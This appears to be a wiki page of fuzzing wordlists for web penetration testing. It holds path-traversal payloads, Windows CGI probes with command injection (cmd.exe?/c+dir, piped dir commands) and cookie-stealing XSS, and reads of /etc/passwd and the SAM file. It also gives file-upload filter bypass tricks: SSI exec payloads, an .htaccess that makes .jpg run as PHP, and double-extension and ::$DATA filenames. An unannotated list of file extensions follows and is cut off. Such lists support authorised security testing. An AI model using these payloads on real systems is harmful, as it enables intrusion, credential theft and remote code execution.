././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}&lt;br /&gt;
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
./../{FILE}&lt;br /&gt;
./.././../{FILE}&lt;br /&gt;
./.././.././../{FILE}&lt;br /&gt;
./.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././../{FILE}&lt;br /&gt;
./.././.././.././.././.././.././.././../{FILE}&lt;br /&gt;
.\..\{FILE}&lt;br /&gt;
.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.\..\.\..\.\..\.\..\.\..\.\..\.\..\.\..\{FILE}&lt;br /&gt;
.//..//{FILE}&lt;br /&gt;
.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}&lt;br /&gt;
.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../..//{FILE}&lt;br /&gt;
../..//../{FILE}&lt;br /&gt;
../..//../..//{FILE}&lt;br /&gt;
../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//{FILE}&lt;br /&gt;
../..//../..//../..//../{FILE}&lt;br /&gt;
../..//../..//../..//../..//{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\\{FILE}&lt;br /&gt;
..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\{FILE}&lt;br /&gt;
..///{FILE}&lt;br /&gt;
../..///{FILE}&lt;br /&gt;
../..//..///{FILE}&lt;br /&gt;
../..//../..///{FILE}&lt;br /&gt;
../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..///{FILE}&lt;br /&gt;
../..//../..//../..//..///{FILE}&lt;br /&gt;
../..//../..//../..//../..///{FILE}&lt;br /&gt;
..\\\{FILE}&lt;br /&gt;
..\..\\\{FILE}&lt;br /&gt;
..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\\\{FILE}&lt;br /&gt;
..\..\\..\..\\..\..\\..\..\\\{FILE}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Windows CGI (Update: 17 March 2010 - Total Statements: 76)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Common Windows CGI   (Update: 17 March 2010)&lt;br /&gt;
# fuzz inside executable directories&lt;br /&gt;
# on windows, this is usually /scripts or /cgi-bin&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass (Update: 17 March 2010 - notes only) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumerated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Generic (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - PHP Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
# PHP on Windows&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass - Microsoft Specific (Update: 6 April 2010) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# &lt;br /&gt;
# Another test: use exiftool http://www.sno.phy.queensu.ca/~phil/exiftool/  to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 2)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== PHP-Specific Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 7)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# PHP-Specific File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
{PHPSCRIPT}.php.doc&lt;br /&gt;
{PHPSCRIPT}.php.xls&lt;br /&gt;
{PHPSCRIPT}.php.xlsx&lt;br /&gt;
{PHPSCRIPT}.php.pdf&lt;br /&gt;
{PHPSCRIPT}.php.jpeg&lt;br /&gt;
{PHPSCRIPT}.php.gif&lt;br /&gt;
{PHPSCRIPT}.php.zip&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename Appends (Update: 17 March 2010 - Total Statements: 14)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends (Update: 10 April 2010 - Total Statements: 9)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;#Commonly Writable Directories - For File Upload Filter Bypass - Filename Appends  (Update: 17 March 2010) &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
{PREFIX}/templates_compiled/&lt;br /&gt;
{PREFIX}/templates_c/&lt;br /&gt;
{PREFIX}/templates/&lt;br /&gt;
{PREFIX}/temporary/&lt;br /&gt;
{PREFIX}/images/&lt;br /&gt;
{PREFIX}/cache/&lt;br /&gt;
{PREFIX}/temp/&lt;br /&gt;
{PREFIX}/files/&lt;br /&gt;
{PREFIX}/tmp/&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
